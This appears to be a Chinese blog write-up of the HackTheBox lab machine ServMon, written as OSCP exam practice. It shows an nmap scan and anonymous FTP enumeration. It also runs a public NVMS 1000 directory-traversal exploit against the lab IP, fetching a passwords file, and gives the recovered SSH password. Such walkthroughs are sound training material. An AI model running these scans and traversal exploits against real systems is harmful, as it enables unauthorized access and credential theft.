EthanDoctor

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

Ethan医生1周前靶场24

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

10.129.227.77

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.227.77 (扫描TCP)

image.png

image.png

image.png

通过匿名登入ftp


ftp 10.129.227.77  ,发现在Users底下有两个用户

image.png

通过遍历ftp服务,我们发现两个用户nadine和nathan

同时也发现了两个文件

Confidential.txt

'Notes to do.txt'


80端口

image.png



弱口令都没有用

尝试

searchsploit nvms 1000

image.png

目录遍历

python2.7 48311.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

没测试成功

使用GOOGLE查询

https://github.com/AleDiBen/NVMS1000-Exploit/tree/master

github下载下里


python nvms.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

image.png

爆破发现密码L1k3B1gBut7s@W0rk     


登入ssh nadine@10.129.227.77

标签: OSCP
返回列表

上一篇:OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

下一篇:OSCP备考_0x52_HackThBox靶机_Windows_Buff

相关文章

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.57.118 (扫描TCP)nmap -sU --top-ports 100 10.129.57....

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.23...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号